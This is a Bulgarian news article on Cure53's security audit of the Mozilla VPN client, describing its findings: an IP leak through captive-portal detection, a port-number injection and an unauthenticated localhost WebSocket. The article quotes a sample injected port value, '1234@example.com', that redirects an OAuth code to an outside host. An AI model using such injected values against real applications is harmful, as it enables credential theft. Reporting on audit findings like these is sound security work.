Обявени са резултатите от одита на VPN клиента на Mozilla

Компания Mozilla обяви за завършването на независим одит на клиентския софтуер за свързване със сървиса Mozilla VPN. В хода на одита беше извършен анализ на отделното клиентско приложение, написано с използване на библиотеката Qt и предоставяно за Linux, macOS, Windows, Android и iOS. Работата на Mozilla VPN се осигурява от над 400 сървъра на шведския VPN провайдър Mullvad, разположени в повече от 30 страни. Свързването с VPN-съсрвиса се извършва с помощта на протокола WireGuard.

Одитът е извършен от компанията Cure53, която в миналото е провеждала одити на проекти като NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Одитът обхваща проверка на изходния код и включва провеждане на тестове за откриване на възможни уязвимости (въпросите, свързани с криптографията, не бяха разгледани). По време на проверката бяха установени 16 проблеми с безопасността, от които 8 имат характер на препоръки, 5 са класирани с ниско ниво на опасност, две - със средно, а един - с високо.

При това само един проблем с средно ниво на опасност беше отнесен към категорията на уязвимостите, тъй като единствено той беше подходящ за експлоатация. Посоченият проблем водеше до изтичане на информация за използването на VPN в кода за определяне на captive portal поради изпращане на незашифровани прями заявки по HTTP, предавани извън VPN тунела и разкриващи основния IP адрес на потребителя в случай, че атакуващият може да контролира транзитния трафик. Проблемът се решава чрез деактивиране на режима на определяне на captive portal в настройките.

Втората средна степен на опасност е свързана с липса на подходящо почистване на нечисловите стойности в номера на порта, което позволява организиране на изтичане на данни за удостоверяване OAuth чрез подмяна на номера на порта с низ от вида "1234@example.com", което ще доведе до инсталиране на етикет <img src="»http://127.0.0.1:1234@example.com/?code=…»" alt="»»">, който се обръща към example.com вместо 127.0.0.1.

Третият проблем, маркиран като опасен, позволява на всяко локално приложение без автентикация да се свърже с VPN клиента чрез WebSocket, свързан с localhost. Като пример беше показано как при активен VPN клиент всеки сайт може да организира създаването и изпращането на екранна снимка чрез генериране на събитие screen_capture. Проблемът не беше отнесен към категорията на уязвимостите, тъй като WebSocket се използваше само в вътрешни тестови сборки и приложението на този канал за комуникация именно се планираше в бъдеще за организиране на взаимодействие с браузърното разширение.

Източник: opennet.ru

Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри 🔥 Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри | ProHoster